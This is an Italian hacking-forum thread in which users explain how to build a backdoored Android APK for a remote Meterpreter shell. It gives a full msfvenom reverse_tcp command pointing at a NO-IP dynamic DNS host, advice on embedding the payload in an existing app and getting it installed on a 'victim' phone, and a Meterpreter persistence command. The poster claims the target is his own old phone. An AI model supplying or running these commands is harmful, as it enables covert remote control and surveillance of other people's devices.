Discussione Malware Malware per andorid

[Eoloprox]

Buonasera a tutti,
Ho pieno accesso ad un mio vecchio cellulare andorid, vorrei testare una backdoor per raggiungero sia in WIFI
che dall'esterno... avrei dei dubbi a riguardo...
Ma se installando un APK su un cellulare, è possibile raggiungerla in remoto anche se la rete è Nattata?
Che exploit dovrei utilizzare per generare l'apk per arrivare ad una sessione meterpreter raggiungibile dall'attaccante via NO-IP?

 

[WW313NET]

Puoi utilizzare android/meterpreter/reverse_tcp e poi devi far installare l'APK malevolo sul telefono vittima.

 

[Eoloprox]

resta persistente? Poi quando lancio la sessione meterpreter non dovrei specificare nessun ip? Si collega da solo?

 

[0xbro]

Puoi provare con meterpreter ma c'è il rischio che la versione sia troppo vecchia e dia problemi.
Ovviamente devi settare un listener sulla macchina attaccante in modo che intercetti la connessione di ritorno tramite il ddns. Il payload dell'APK deve puntare al DDNS.

Per generarlo puoi utilizzare msfvenom e o embeddarlo in un'apk già esistente oppure creare un'apk ad-hoc

 

[Eoloprox]

ok, grazie in anticipo, ho trovato il comando, resterebbe soltanto di specificarne una password per non fare accedere a terzi il device:

msfvenom –p android/meterpreter/reverse_tcp LHOST=eoloprox.noip.com LPORT=4444 R> /var/www/html/ehacking.apk

Anche sè forse il livello di protezione è già un po settato, in quanto punterebbero solo connessioni al mio NOIP....
A riguardo della rimozione del trojan basterebbe inviare il comando da meterpreter..OK?

 

[WW313NET]

Se vuoi rendere persistente la shell, devi lanciare questo comando una volta avviata la sessione meterpreter:
run persistence -X -p 8081 -r 192.168.1.133 -i 5